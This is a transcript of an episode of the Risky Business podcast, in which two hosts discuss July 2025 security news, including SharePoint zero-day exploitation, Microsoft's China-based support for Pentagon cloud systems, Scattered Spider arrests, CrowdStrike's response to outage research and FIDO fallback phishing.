Risky Business - Risky Business #799 -- Everyone's Sharepoint gets shelled
Episode Date: July 23, 2025Risky Biz returns after two weeks off, and there sure is cybersecurity news to catch up on. Patrick Gray and Adam Boileau discuss: Microsoft tried to make outsourcin...g the Pentagon’s cloud maintenance to China okay (it was not) She shells Sharepoint by the sea-shore (by ‘she’ we mean ‘China’) Four (alleged) Scattered Spider members arrested (and bailed) in the UK Hackers spend $2700 to buy creds for a Brazilian payment system, steal $100M Fortinet has SQLI in the auth header, Citrix mem leak is weaponised, HP hardcodes creds and Sonicwalls get user-moderootkits. Just security vendor things! This week’s episode is sponsored by Airlock Digital. CEO David Cottingham talks through what it takes to build a mature, resilient management platform for a security critical system. This episode is also available on Youtube. Show notes Update on DOD’s cloud services Microsoft to stop using engineers in China for tech support of US military, Hegseth orders review A Little-Known Microsoft Program Could Expose the Defense Department to Chinese Hackers While DOD policy bans unauthorized apps like TikTok from being on employees phones over national security risks Microsoft Fix Targets Attacks on SharePoint Zero-Day – Krebs on Security National Guard was hacked by China's 'Salt Typhoon' group, DHS says Suspected contractor for China’s Hafnium group arrested in in Italy | Cybersecurity Dive Singapore accuses Chinese state-backed hackers of attacking critical infrastructure networks | The Record from Recorded Future News UK Arrests Four in ‘Scattered Spider’ Ransom Group – Krebs on Security Four people bailed after arrests over cyber attacks on M&S, Co-op and Harrods Brazilian police arrest IT worker over $100 million cyber theft | The Record from Recorded Future News At Least 750 US Hospitals Faced Disruptions During Last Year’s CrowdStrike Outage, Study Finds | WIRED Hacker returns cryptocurrency stolen from GMX exchange after $5 million bounty payment | The Record Indian crypto exchange CoinDCX says $44 million stolen from reserves | The Record Chainalysis: $2.17 billion in crypto stolen in first half of 2025, driven by North Korean hacks | The Record PoisonSeed bypassing FIDO keys to ‘fetch’ user accounts Risky Bulletin: Browser extensions hijacked for web scraping botnet A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors A surveillance vendor was caught exploiting a new SS7 attack to track people's phone locations | TechCrunch Ukrainian hackers wipe databases at Russia's Gazprom in major cyberattack, intelligence source says File transfer company CrushFTP warns of zero-day exploit seen in the wild | The Record HPE warns of hardcoded passwords in Aruba access points Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257) Researchers, CISA confirm active exploitation of critical Citrix Netscaler flaw | Cybersecurity Dive Google finds custom backdoor being installed on SonicWall network devices - Ars Technica Hackers Can Remotely Trigger the Brakes on American Trains and the Problem Has Been Ignored for Years
Transcript
Discussion (0)
Hey everyone and welcome back to Risky Business, my name's Patrick Gray.
Yeah, I'm back on deck after having a lovely holiday in Fiji.
Pardon me in here, I'm still back there in my mind a little, but it is good to be back
on deck.
Adam and I are going to go through the week's news in just a moment and then we're going to hear from this week's
sponsor and this week's episode is brought to you by Airlock Security, a
company that I really love. They're an Australian company that does allow
listing software and it works on Windows obviously, also Linux and Mac and you
know you can use it for allow listing at scale they've
got customers with like a hundred thousand plus endpoints under
management but you can also do like host hardening with it and prevent people
from being able to easily move laterally and your environment using LOL bins it's
really good software so Airlock Digital. This week's sponsor and we're talking to
Dave Cottingham who is Airlock this week, about what it's like building a grown-up enterprise platform for allow listing, where all of a sudden you need to have like a multi-role console and whatnot.
It's a conversation that's much more interesting than it sounds, now that I've just said what it's about, but you'll see what I mean.
That's coming up later. But first up, of course, it is time to get into the week's news with Adam Bailo.
Mr. Adam, thank you for joining me.
Yeah, it's good to have you back on the internet.
I guess it's a little bit melted while you're away, so that's good.
Yeah, I tried to not pay attention, but I couldn't actually escape this story because
I had friends texting me about it while I was over there.
So this is a bit of a twisted road, this one.
It starts off with a piece from ProPublica, which was
published about a week ago. And the piece basically said that Microsoft has a
whole bunch of engineers in China who do support work for Microsoft's cloud
customers, which includes the Pentagon. So I mean, look, getting the Chinese MSS to
do your cloud support seems like a weird choice for the Pentagon, but this is the way that they've done it.
But don't worry, they have a compensating control, Adam, for this, which is they have
these digital sherpas who will escort these digital escorts, which will escort these Chinese
workers into the Pentagon's cloud where there is classified information to make sure they
don't do anything wrong. And you know, that's fine, right?
That's fine. Until you read in this article that the pay rates for these
digital Sherpas, whose only requirement, like tech skills are a nice to have,
the only requirement is that they actually hold a clearance and they're paying
them 18 bucks an hour.
Yeah, that one really hurts.
I like the idea that you can secure a malicious person's admin access to your environment by paying
someone to watch them is already kind of shonky enough without it being someone who doesn't
understand the specific technology and for that kind of pay rate, you're not getting
people who could do the actual work for 18 bucks an hour rate, like you're not getting people who could do the actual work
for 18 bucks an hour.
Otherwise they would be paying them to do it.
And the idea that you can make this okay,
I mean, clearly you can't, right?
And that's the sort of the revelation from the story,
but it kind of, it looks like this has been going on
for really quite some time,
and that this was part of how Microsoft made the costing work to go sell the cloud to the DOD, which,
you know,
I mean, two thumbs up, two thumbs up, buddy. What a great idea. Right. So,
yeah, this, this actually picked up real quick.
And one of the reasons it picked up is you had, uh, you know,
well known right wing loon, uh, Laura Luma picked picked up is you had, you know, well-known right-wing loon, Laura Lumer,
picked it up and she had access to some guy who was like a whistleblower,
who talked about how, yeah, getting support from Microsoft and it's like the person on the other end of the line is Chinese.
So this is, you know, really picked up across, like this is why it's a bit of a twisty one, right?
Is because you've got ProPublica running with this and then it gets picked up also
by the very right wing sort of mega fringe and everybody agrees.
Like just a rare moment of bipartisanship, right?
A very rare moment of bipartisanship where absolutely everyone agrees
this is a bad idea.
And except Microsoft, we've already said, oh, we're not going to do that anymore.
But this is culminated in
Pete Exoth, the US Defense Secretary, announcing that, yes, no more Chinese contractors supporting
DoD cloud, please. Here is an excerpt from him announcing that. It turns out that some tech
companies have been using cheap Chinese labor to assist with DOD cloud services.
This is obviously unacceptable,
especially in today's digital threat environment.
Now this was a legacy system created over a decade ago
during the Obama administration,
but we have to ensure the digital systems
that we use here at the Defense Department
are ironclad and impenetrable.
And that's why today I'm announcing
that China will no longer have any involvement whatsoever
in our cloud services effective immediately.
So there we go, Pete Hegseth and his wonderful hair
announcing yes, no more, no more.
The MSS will no longer be supporting
the DOD's cloud infrastructure.
I mean- It's just bonkers, you know?
It's bonkers.
And you've got to wonder how many other places have done the same thing because the market
competes on price.
And if Microsoft had to do this to be cheap, presumably everybody else also has to scrape
the bottom of that barrel as well to be able to match the rates there.
So I wonder how many other people are going and quietly
changing their equivalent program
to do the same sort of thing for various bits of,
the defense industrial base.
Yeah, I mean, look, full credit to Hegseth though,
full credit to the DOD for recognizing
that this is a problem and trying to turn it around.
Although I do feel like Hegseth's two week timeline
to understand exactly how big a problem this is is
somewhat ambitious, let us say.
Yeah, I mean this is a program that has been there for a long time and you know getting rid of it overnight is not going to be straightforward, right?
They have to figure out who's going to do this, who's going to pay for it, you know, all those kinds of things.
And you know, this is not a unique to Microsoft sort of thing.
I mean, we've seen, you know,
I know I've been on the other end
of this kind of arrangement as well in my professional career
where I was allocated the Sherpa, you know,
to vet the commands that I was going to type into a Unix box
and then type them in for me.
So yeah, the whole idea is just not workable.
I want you to go into a little bit more detail about what that experience was like because
you have told me that over the last few days and you did not feel that the person who was
supposed to be your guide in this sensitive environment really had much of an idea of
what you were actually doing.
No, no, not at all.
I think in this particular case I was doing like Unix host reviews on some Unix boxes in some sensitive places,
and I was given, you know,
in order to get privileged access to it,
somebody else had to be my terminal,
and I had to tell them what type.
And then I wasn't even allowed to see the output
of the commands.
The output to the commands got saved to a file,
and then the person who was my Sherpa
collected that output, gave it to their manager,
who gave it to their manager, who gave it to the project and then the person who was my Sherpa collected that output gave it to their manager who gave it to their manager who gave it to the project manager at the company that was
providing the Sherpa who then gave it to my project manager at the customer who then gave
it to our project manager at Insomnia at the time and then they gave it to me and then
after it had been through 47 hands and this process of course took weeks.
Well, I mean, you know, with a process like that,
you could really start to see the efficiency benefits
of using people in low cost places, right?
What an efficient process, amazing.
And the thing that I found best
about that whole experience though,
was I still shelled the damn thing.
It just, it was not a fast process or a fun process,
but we still got there in the end.
Still managed to previse, still managed to get my job done.
So yeah, very, very effective.
Good work.
Yeah.
Amazing.
Amazing.
Now look, the other thing that's going on at the moment, some bread and butter info sec that I'm guessing a lot of the audience are dealing with at the moment is
this, yeah, in the wild exploitation of a recent bug in SharePoint server.
I mean, that ain't great.
No, I mean, if you leave the SharePoint lying around on the internet, a lot of people do
still.
And this is on-prem SharePoint, not the cloud SharePoint.
Then, yeah, you're going to have a bad time.
And in this particular case, Microsoft has patched it over the weekend, but this was
being used in the wild pre-patch.
Yeah, it was being used as O-Day, right?
Yes, it is not great. And this is like a combination of sort of an auth bypass plus deserialization
based code exec, which, you know, not what you want in your SharePoint, but also we've
seen attackers using it to steal machine keys, which in.NET applications, if you know the machine key,
you can deserialize and run code kind of by design.
And the machine key is meant to be secret for that purpose.
So they're using this to gain machine key access.
And then even after it's patched,
they can come back in the future and code exec.
And given that like everybody from China
seems to be hacking all of the
SharePoints over the weekend, it's gonna be a rough time. Even if you did
patch it, if you didn't patch it quite fast enough, may not matter three
months down the track when they decide to come back and hit you again.
Yeah, I mean you and I were talking before we got recording about this one
and my comment was I do not understand why people who create these sort of
web applications expose so much attack surface pre-auth. It just seems crazy to me that before
you've authenticated to some sort of web service, that you can hit anything that isn't the login,
you know, the username and password fields.
And that should be pretty easy to not have exploits in.
You know what I mean?
Like it's just nuts.
Yeah, it is.
It is.
And in the.NET case in particular, the fact that their authentication scheme relies on
deserializing an object, right?
The cookie that you get to auth with is an object that gets deserializing an object. Right, the cookie that you get to auth with is an object
that gets deserialized.
So by design, the unauthed attack service
includes deserialization,
which they rely entirely on that machine key
as that's the only thing that stops you
from turning that into ARP Code Exec.
So having a attack service is one thing,
but then kind of specifically designing high risk stuff
into your pre-orth attack surface
Yeah for the sake of of what right one wonders
It's just yeah, it boggles the mind. There's just you know so much complexity in modern auth that you kind of can't really trust it
well
Yeah, I mean there is that but there's also the fact that you've got a lot of these sort of services and appliances where they
Just leave stuff lying around
Everywhere publicly accessible like think of stuff like PHP file include vulnerabilities, right? Like or anything made by Oracle
Yeah, exactly
40,000 JSP scripts that you can hit un-auth and they're all terrible. Yes
Yeah, and for too long and it's something I've said before for too long
We've sort of considered that authentication is access control and it's just not and this is why so I mean
What can you do about this if you want to run stuff like SharePoint, if you want to run
like file transfer appliances, payroll systems, this, that, whatever it is out on the edge of the
network for your staff to be able to access and for partners to be able to access, you know you
might consider using some sort of reverse proxy right? So I think Okta has one so if you're an
Okta customer you can do that it's probably going to cost you a bit. Uh,
Authentic, which is an open source IDP that I work with. Um,
they've got a reverse proxy as well.
There's a company called Pomerium that just does reverse proxies.
There's the company that I'm on the board of, which is Knockknock,
which also has a reverse proxy.
So there's a lot of ways to simply set up reverse proxies
onto systems like this
that basically do not give you anything
until you're authenticated, right?
Like you just can't hit the machine.
So, you know, I would think that is something
people should look at.
Go get run zero, have a look at what's on your perimeter
and then start cutting this off.
Cut it off, cut it.
Everything you can get rid of, you know,
every little bit of attack service that you know
You have to at least behind or four
Just makes attackers miserable. I'm like make them miserable. Yeah, it does it does
You know, I just think that's a sensible thing to do at this point
I think like leaving this sort of stuff out at the edge with nothing in front of it is just not it's not gonna
Be a good time. I mean we can't trust the vendors to write safe software to do their own auth. You've got to layer something on front of it.
Yep, that's it.
That is it.
All right.
So now look, what have the Chinese been up to apart from helping the DoD manage its cloud
environment?
Well, exploiting SharePoint bugs is one thing.
They've also been hacking the National Guard as well, apparently, according to NBC News.
Yeah, Kevin Collier wrote this piece about the Chinese group Salt Typhoon, apparently
broke into one of the US states National Guard.
We don't know which particular state.
So far that particular detail hasn't come out, but there was a memo, I think, from the
Department of Homeland Security which described the fact that there had been this intrusion.
And obviously, yeah, National Guard's not a place you particularly want there to be Chinese attackers.
Yeah, I mean Salt Typhoon is something I normally associate with telco hacks,
so I'm not sure quite why they're doing this.
Well, I mean, I guess, you know, why not?
If you're hacking stuff to gain access, prepare the battle space, etc., etc.,
then yeah, I mean military stuff, telco stuff, it's all high value. But I mean, Vault Typhoon is the one that's doing
that sort of more preparation of the battlefield, right?
Salt Typhoon has just been telcos and like wiretaps
and stuff like that, right?
So, just kind of a big deal.
Who knows?
Yeah.
Maybe it's contractor, you know,
just fill in their boots.
Well, speaking of contractors that do like,
hacken for the Chinese government,
the Italian authorities, the Italian
authorities, Italian authorities working with the FBI have arrested a Chinese guy
in Italy over the hafnium like exchange hacks and everybody would remember that
back then, oh my god it was like five years ago now, but remember when every
single exchange box was just getting shelled by everyone completely? This was
yeah there was a China nexus to that.
And it looks like this guy, Zhu Zhewei, 33 years old,
he's been charged over this stuff and it looks like he works for a
contractor called Shanghai PowerRock Network Company, which awesome name, dude.
But they apparently contracted the MSS and
yeah, so now he's in trouble and he's going to get extradited.
Now does this set a precedent that China can start arresting NSA people?
I don't think so, personally, because this sort of like massively destructive attack,
you know, it's just very messy, creates a lot of collateral damage.
It's very different to the sort of operations that Five Eyes countries tend to do where
you'd rarely hear of them because they tend to be quite careful, they tend to limit scope,
they tend to clean up after themselves, whereas these guys, they're just the proverbial bulls
in a china shop.
Yeah, they certainly did make quite a lot of mess.
And I think, you know, also, you know, if you work at any sale, some Five Eyes agency,
chances that you're going to go to Hong Kong on holiday
Probably not super high like I think that's probably drilled into you pretty hard
You might go somewhere that might have some sort of agreement with China or whatever
But I look there's a couple of reasons why it won't happen first of all the opsec in the five eyes agencies is actually pretty good
Yeah, so I think that's that's a real thing that would prevent this but But yeah, so I wouldn't just say that like, you know,
it's about NSA operators not having holidays in Hong Kong.
Like I just I don't think it's the same thing.
Yeah, I guess I don't know what the state of, you know, China's
relationship with other countries for extradition agreements are.
And I guess that's the problem, right?
If, you know, if they do have relationships with either Brazil or whoever,
then maybe that makes going
somewhere a little more complicated.
The thing I guess that struck me about this story is when we have seen indictments of
Chinese operators by US law enforcement, there's been quite a lot of people saying, look, what's
the point of this?
Why do we bother doing this?
They're never going to face justice.
One time in 100, one of them gets on a plane
and goes to Milan.
So you don't know if there is something happening to them.
It's also a mechanism for the US government in this case
to actually put pen to paper and publicly do an accusation.
Do you know what I mean?
Like it's a public attribution, it's an official document.
Like I don't think it's pointless.
I think just the act of actually doing these sort of indictments,
even if the person is never going to be apprehended,
I think there is value in that.
Yeah, yeah.
But there has been a lot of criticism, I guess, of that work
and whether it's kind of a waste of effort.
But hey, you know, I'm going to be interested to see what happens
when this guy gets back to the US.
Like, what's that going to look like?
Well, it's going to look like a bunch of charges.
And probably the Chinese government saying, these are all lies.
These are all lies. This guy has nothing to do with us.
So I can't imagine they're going to go to bed for this guy.
Like it probably not.
Apparently Chinese state backed hackers, a group, an uncategorized group,
UNC 3886, has apparently
been owning up some critical infrastructure in Singapore according to a senior official there.
Yeah, that makes a lot of sense. Singapore is definitely the sort of place you'd expect
there to be Chinese attackers. I think this particular group is one of the ones we've seen,
you know, exploiting Fortinet bugs, exploiting VMware bugs, like feels like one of the, you know,
kind of private contractors sorts of companies.
So yeah, not surprising to see them there.
No, now we've got some good news here, which is four Brits, young, between 17 and 20,
have been arrested over sort of scattered spider ransomware stuff, including the attacks
on Marks and Spencer and Harrods. Some of these people were also involved in like the
MGM casino hacks back in 2023. And yeah, they're just going to have a very, very bad time,
I suspect. Although, you know, if you had to choose as a computer criminal, whether
or not you would want to be arrested in the UK or whether you would want to be arrested in the United States, like it ain't
even close. I would like to go to the UK court, please. I'm unsure whether or not there's
going to be any sort of extradition here if anyone's seeking it or whatever over the MGM
stuff. But yeah, at the very least they've been bailed. All four have been bailed. But
yeah, they're in big trouble. Yeah, yeah, they certainly are. And Brian Krebs, so when they were arrested and then
subsequently bailed, we didn't see any public reporting of their names. Krebs did some footwork
and figured out that one of them, it's a guy called Owen David Flowers, who was the one
that was involved in the MGM hack. And he's pulled some threads about some of the nicknames
the guy was using on the internet. Another one was the guy who was behind Docsbin, also a member of Lapsis,
been kicking around that scene for a number of years now. And Krebs has a good, you know,
kind of write-up of that particular guy's history. Thala Joubert is his name. So yeah,
that looks like kind of bad news sort of guy. He got doxed
by one of the other members of Lapsus, you know, back in that particular set of scene wars. So yeah,
been kicking around for quite some time. With friends like those, as they say. It's interesting
too, because Tom wrote this up, I think it was like around the time I left for my break,
that Threat Intel company's been putting out research saying that the idea that scattered spider
is a vibe, as we like to say on the show, is not actually right.
And there's something, there's a very small group of people who direct most of the really
malicious bad activity, something like four people.
I think two different companies had settled on that four people figure.
I'm not sure if these, if any of these are part of that four,
but the idea seems to be at the moment, the thinking seems to be out there,
that it will be possible for law enforcement to make a dent on the activity
that we've been attributing to this scene.
And that it's maybe not the entire scene that's doing most of the damage.
It's just a few sort of skilled and's doing most of the damage is just a few
Sort of skilled and highly motivated people so that is interesting
Yeah, yeah, I mean, it's you know I'm sure when we see the inside details of all of this like we'll have some
You know have a better idea of how it worked
But that tends to be like these underground communities there tends to be a few big personalities
That drive everything else and kind of like drag everyone else along with them
and then you know people want to level up and get better and prove that they have skills too.
And that kind of drives a bunch of the competing sort of activity they undertake.
But yeah, there tends to be some big names that once you drop the hammer on them,
it's pretty bad for the scene overall. Yeah. Now John Grieg has a write-up about an arrest in Brazil over the theft of a
hundred million dollars through Brazil's instant payment system which is called
PICS right. So this guy worked for CNM software and I'm not exactly sure if
does CNM actually maintain PICS or it just like they use their access in CNM to get to the PICS system?
I think what I had read is that they are a provider that
Does like PICS software access for smaller banks that don't have their own infrastructure to do it
So they are one of the people that provides access to PICS mostly for smaller banks. Okay point is
This breach was enabled via access into a company called CNM Software.
And the police have arrested this guy.
He's 48 years old.
He sold his account name and password to some hackers for $2,700 US dollars in two separate
cash payments after they approached him in a bar.
And that's led to a $100 million theft.
Yeah, that's a hell of a return on investment for the attackers. But yeah, that, like this insider
kind of threat aspect to it, like really should make people's spidey senses twinge, right, because
we spend so much time on cyber controls and computer stuff.
But in the end, if one of your employees is willing to sell their access, you know, for
not a whole bunch of money, then a lot of that kind of edge perimeter stuff really stops
mattering when it's a case of spending that kind of money. And I think this guy was a,
I think I read that he was like he was an electrician or something like some other technical
trade who had retrained into IT later in his career because he wanted to you know better
himself and you know it's kind of sad in the way that probably he didn't really
understand what he was you know the impact of what selling his credentials
would mean so you know we don't know what they told him they wanted to do
with that access as well right but I think the yeah just generally speaking if someone approaches you at a bar and offers to buy your username and password for your work
accounts, um, yeah, it's not going to go well. It's really not going to go well. So yeah, I mean,
what do you, what do you even say about this? I mean, what, what, what can you do as you said,
like, okay, great. Okay. Give everyone Yuba keys. Well, then they'll just sell their Yuba keys.
Yeah. Yeah. You know, if you restrict restrict it if you restrict access into those physical buildings
like at what point are they do they start taking bribes to smuggle people into the buildings and access a terminal and like
You know when you've got a motivated insider like this
Yeah, woof pretty hard. Yeah, it's hard right and then and then what's the what do you do?
Well, you you pay good wages and you treat your employees well
and make sure no one's got any grievances
and like it's hard and expensive.
Yeah, but even then we've seen malicious insiders
at places where they were being looked after,
where they were being treated well, you know,
and it can be something as simple as like office politics
that trips someone into doing this, you know.
Now let's talk about CrowdStrike
and how it has completely lost its mind.
CrowdStrike is disappearing up its own clacker and it is just bizarre.
We've got a piece here from Andy Greenberg looking at some research out of UC San Diego,
trying to pin down exactly how disruptive their kernel panic was to the healthcare sector
in the United States.
Now I think that's a worthy, I think that's a worthy endeavor to try to figure this out.
I do.
Now can you pin it down exactly?
No, but it seems like the researchers here have made a good faith attempt to see, you
know, how many hospitals had had disruptions to their systems.
Crowdstrike's response to this has been kind of deranged.
They've called it junk science.
They've said, drawing conclusions about downtime
and patient impact without verifying the findings
with any of the hospitals mentioned
is completely irresponsible and scientifically indefensible.
And then they pivot from there into a, well,
we recognize we had an incident and we sincerely
apologize to customers.
So look, we're getting to a discussion on this in a moment.
But look, I just want to say a couple of weeks ago, we actually got an email from crowd,
I'm about to spill some tea, everybody.
I'm about to spill some tea, as the kids say.
We got this email from CrowdStrike's like APJ
director of public relations asking us to correct an error in a newsletter that
was written and published by us. It was Catalan's Risky Bulletin newsletter and
it said, oh can you correct the sentence, a bug in the CrowdStrike kernel driver
took down over 8.5 million Windows systems." And then this is the
CrowdStrike person speaking. The incident was from a defective rapid response
content update as noted on our website and in the RCA also attached.
Rapid response content updates are not code or a kernel driver. This sentence is
inaccurate as written. We request that you please replace blah blah blah blah
blah blah blah blah to accurate language.
Now I ignored this.
And then they emailed again.
Hi, Catalin, hope you're well.
As per my initial email yesterday,
could you please update blah, blah, blah, blah, blah, blah?
Now, if you've got a content update
that can trigger this condition,
you have a bug in your kernel driver.
Would you agree with that?
I would agree with you.
So I wrote back in the end, I said, hey,
a name redacted, I'm the publisher here at Risky Business Media.
It takes a pretty serious deficiency, a bug, you might call it,
for a kernel driver to crash when supplied with a content update.
We're happy with our phrasing here.
But the reason I wanted to talk about that email, right,
is because I think CrowdStrike has almost taken on like a bit of a cult-like mentality. I think CrowdStrike makes best in class, you know, EDR, right?
Like it is fantastic. I think the Microsoft stuff's good as well.
The Sentinel One stuff's good as well. But I think, you know,
CrowdStrike really has been the company that has, for
the largest proportion of users, defined that space.
They've grown a lot.
They keep buying and bolting on all sorts of monstrosities onto this to try to platformatise
their offering.
And by all reports, their additional products just aren't really that good.
I'm just going to say it.
They're not that great.
People will bite the bullet, buy it, use it use it because okay, we're already a CrowdStrike custom.
We've already got that footprint out there, but no one really thinks it's best in class anything.
And yet the people who work there and the PR response just seems bizarre. It seems cult-like.
Do you sort of see what I'm saying? Yeah, yeah. It does seem like a strange
hill to die on, right?
Like you could make your product good and do good work and do all the engineering
and if necessary stuff to not have these problems at the first place.
Or you can send your PR people out to, you know, tell a small Australian blogger.
Like in what universe, in what universe was that a good idea for them to do that?
Like in what universe is that a hill worth fighting on, worth climbing, let alone dying on?
Yeah, yeah, I know.
They could gargle my, CrowdStrike, you can gargle my coconuts.
Yes.
Anyway, back to this paper.
What do you think about this research?
I think it's a good idea to try to quantify what the disruptive impact to the US health care system is.
I've always said that this CrowdStrike outage
or CrowdStrike blue screen of death across millions of boxes
that happened last year was the best sort of simulation
we're gonna get of a large scale cyber attack
until we actually get a large scale cyber attack.
So I think this is a good idea.
Yeah, no, it is.
The researchers in question, they were already monitoring the uptime,
like the availability of hospital IT systems,
because they had a project to try and determine who was getting ransomwared.
And so they had this monitoring infrastructure in place.
And then when the CrowdStrike thing happened,
they were able to very quickly use their existing tooling to go collect the same data and say, here are a bunch of hospitals where systems that we can observe
from the outside that are clinically relevant, you know, things like, you know, portals for
doctors to log into and so on, are not available that were previously. And they tried to correlate
based on timing across the set of hospitals that they were looking at, which I think was
about a third of the US medical system
that they had some coverage over.
And then from that infer,
that bad stuff was happening because of CrowdStrike.
And they controlled for,
like there was a Nizira outage about the same time,
and they tried to kind of account for that.
So from the point of view of the research methodology,
it seemed like a pretty reasonable,
at the very least it's interesting.
The data they have is interesting.
And it's clearly not perfect because they
weren't able to go talk to all those hospitals
and get inside the data.
And they're doing it from the outside.
But as a piece of research, it seems pretty representative
and relevant and useful.
Well, I don't think they're making any claims beyond what they've said the data says, right?
Like where, you know, so for CrowdStrike to then attack them like this just seems bizarre.
And I guess I've already got my backup because they're writing to us because they're saying
it wasn't a kernel bug.
I mean, really, does that make a difference, guys?
Like if it was a kernel bug or a content update, you still knew 8.5 million machines.
Yeah, if the airport's blue screened, it does not matter if it was a content
update or a couple of other things. It's the ultimate, ultimate, but actually, actually
it wasn't a catalog, it was a rapid content update. It's totally different. So yeah, anyway,
I just think they've kind of disappeared up their own behind lately.
And it's it's it's it ain't a good sign for the company.
You know what I mean? You know exactly what I'm talking about, right?
I do. All right.
We're not going to talk about these ones so much.
But John Grieg has a write up of two of these over at the record.
The Cryptocurrency Exchange, GMX had $42 million stolen from it and they've agreed
to let the attacker keep $5 million.
That's a bounty.
I mean, we keep seeing this over and over and over.
It's nuts, isn't it?
Yeah, it really is.
And it's just encouraging.
It's classic tragedy of the commons, right?
Where every exchange or person that does this encourages attacks on all of them.
It's just a bad idea.
And the thing is, they're not even really legally binding, right?
I mean, we've seen other people get prosecuted despite having this
white hat reward fiction, and yet they still end up getting arrested anyway.
So, you know, let's hope law enforcement
decides they don't care and are going to go after these people anyway.
I mean, I think the days of us joking, and it was funny at the time,
that cryptocurrency theft is a victimless crime.
You know, it's starting to get a bit serious.
Like there's so much money in this stuff now,
and normal people are starting to invest in it.
Like, you just sort of think-
Invest in very air quotes,
because like, oh, for God's sake.
But they don't realize that.
They think it's a proper investment.
And I think there's all the sharks are going to come in.
I think there's some deregulation happening now in the United States in particular,
which is going to allow all of these sharks to go and like sell people like
crypto tulip bulbs into their 401Ks.
And it's just it's going to end in tears.
The question is just how long.
So there was another one, an Indian crypto exchange called CoinDCX.
They lost 44 million bucks as well. And John Grieg has also written up some chain analysis research
that says 2.17 billion in crypto has been stolen in the first half of 2025. But 1.5
billion of that was the Bybit hack, which I still think was like just so cool.
Yeah, we do got to hand it to the Norks for that one, because yeah still think was like just so cool.
Yeah, we do got to hand it to the Norks for that one because yeah, they did a good job there.
Yeah, but they're predicting like up to four billion in crypto theft this year, which is just wild, wild time.
Now, let's talk about this research out of Expel, which is how to bypass a login flow where someone's using like a YubiKey by using this, what is it?
Cross-device, what's it called again? Cross-device?
Authentication, yeah. So this story is kind of interesting.
It is, it is. I've read through it and I'm like, okay, I get it now, yeah.
So we, so, Catalin wrote the story up for us whilst you were away.
And I remember like, you know,
cause we edit the script pretty early in the morning,
we pasted it in our Slack and said,
hey, Metal, you're gonna wanna read this one
cause it's good read.
And I woke up and this was how I spent the first
like hour of my day reading this story.
The deal is they looked at something
that was being authed with, you know,
with YubiKey to the final key.
And this particular instance of it had a mechanism
where you could fall back,
if you didn't have your YubiKey available,
you could fall back to another authentication mechanism.
So what we are talking about here is a way
to go around a YubiKey rather than a bug in FIDO
or UTF for YubiKey themselves.
And then this involved basically scanning a QR code with your
authenticator app on a separate mobile device and using that to authenticate
your login as a second factor, so that was using that in
password and then you use the QR code to kind of fish the user in an attacker in
the middle context. Now in the way that you would do this
in the U2F ecosystem, like there's the official way
in U2F of doing cross device authentication.
And in that particular like standards way,
there is a Bluetooth callback mechanism
that binds the browser to the auth device
so that everyone agrees who you're authing to
so that you can't do this kind of relay phishing
or in the middle phishing.
In this particular case, that wasn't what they were
attacking, this site had another mechanism,
as best I can tell, had another mechanism
that used a QR code.
So it wasn't the like CDAP with Bluetooth binding,
which is like the way that you should be doing this.
But overall, like regardless of the specific mechanism here,
the way that you can trick users and the way that we fall back around these
robust authentication mechanisms really is the core problem here.
Because people are used to having to get their phone out and scan a QR code.
They're used to having to do things that are not just username and password now,
and yet no one really understands
how any of this actually works yet, and nor should they.
We're meant to be solving these problems for them.
So this is kind of illustrative
of the complexity of modern auth,
and the complexity of non-ideal auth situations
when you're on a strange device,
on a device that doesn't have a keyboard,
on a device that doesn't have a camera, on a device that doesn't have a keyboard on a device that doesn't have a camera on a device that you know doesn't
have the compute power or a USB port or whatever so everything that we build
that makes auth robust we still have to deal with the real world of imperfect you
know end-user computing yeah that's right and I think you know we've talked
a lot over the last two I don't know like half a decade about how one of the weaknesses when you're using robust auth is always going to
be stuff like when people need to reset a credential.
Yeah.
And we've seen a bunch of these social engineering attacks quite recently where that's what people
are doing. They're going to help desks, they're getting their MFA reset or whatever. There's
another incident here that is mentioned in the expel blog post where someone got,
they compromised an account through a phishing email and then they just reset the password
somehow and enrolled a Fido device, which was perfectly good enough for all of the devices
where they had to use that device. So, you know, this isn't a problem per se with like Fido or
U2F. Like the problem is where all of the junk auth reset flows and stuff around
those.
All the glue.
Yeah, it's all the glue.
It's all the times when that's not how you're authenticating and trying to get into that
state.
And I think we're going to see a lot more of this sort of thing for years to come.
Yeah.
I mean, in the end, if we make auth really robust people are gonna steep kind of keep wanting to get in and the rise of
You know the success of scattered spider in doing social engineering attacks on those edge bits, you know on the
Enrollment process on the reset process on the my dog at my YubiKey process
You know those that have a human part like those continue to the weaklings, and people who can exploit those are the ones that are gonna, you know, continue doing the
hacking and continue getting the shells. Yeah, now Catalin also wrote this up, this
one up for us, which was in his newsletter. Oh lordy. So this is some
research from John Tuchner, and I've mentioned John on the show before. He
runs this little startup that he's got called Secure Annex, and they're the ones
that look into the security of Chrome extensions.
And I think it's great.
I really hope he does well with this.
As I said, I've mentioned it before.
I had a call with him a few weeks ago just really talking about what he was doing.
So what he found is a bunch of extensions had this code stuffed into them that allowed
a company to like proxy web scraping requests through browsers that had these extensions
installed into them, right?
So this company is like, we can do a hundred thousand like web scrapes in parallel.
And the way that they fulfill this is through these extensions, which, okay, is that illegal?
I mean, it's probably not illegal.
If there's like a EULA there that someone has clicked through, like I'm guessing it's probably not illegal,
but you probably wouldn't want it running in your browser, that extension, because it turns out it like,
you know, disables a lot of like security headers and whatever, like it's not good. Let's put it that way. It's like not, not a great thing.
But I just found this really interesting story about the sort of things.
Now someone is actually in there in those like Chrome web stores,
actually looking at these things, picking them up and shaking them.
This is the sort of stuff that's falling out.
Yeah. I mean, this was being marketed to developers as a way to monetize their
extensions.
So, instead of selling ads or whatever else, you can, in this case, sell your users a quote
unused bandwidth, end quote.
So yeah, you'd install this SDK or you'd integrate this SDK into your extension.
And then, yeah, when the machine was kind of idle
or whatever else, then, yeah, we'd phone back centrally,
make requests on behalf of the people,
and then send the results back, which, you know,
I'm sure the end, as you said, I'm sure the end user,
you know, agreements or whatever said,
by the way, we'll use our third party advertiser's code
to mumble, mumble, mumble.
But people don't expect that to mean
we're gonna proxy out your connection and in the case of a private network or
a corporate environment or somewhere where your browser has access different
to the regular internet right there are some interesting kind of you know if I
could on a pen test gig go buy access to some end user in an organization's
browser I'm gonna go hit the internal SharePoint.
I'm going to shell lots of internal stuff.
And it'll be party time.
I want to scrape everything on 10 dot whatever, right?
Yes, yeah, exactly.
Go find me the password store or whatever.
Dear.
So probably not criminal, but definitely not good.
No, it's definitely not what you want.
And I think this is great marketing too for Secure Annex because like, you know,
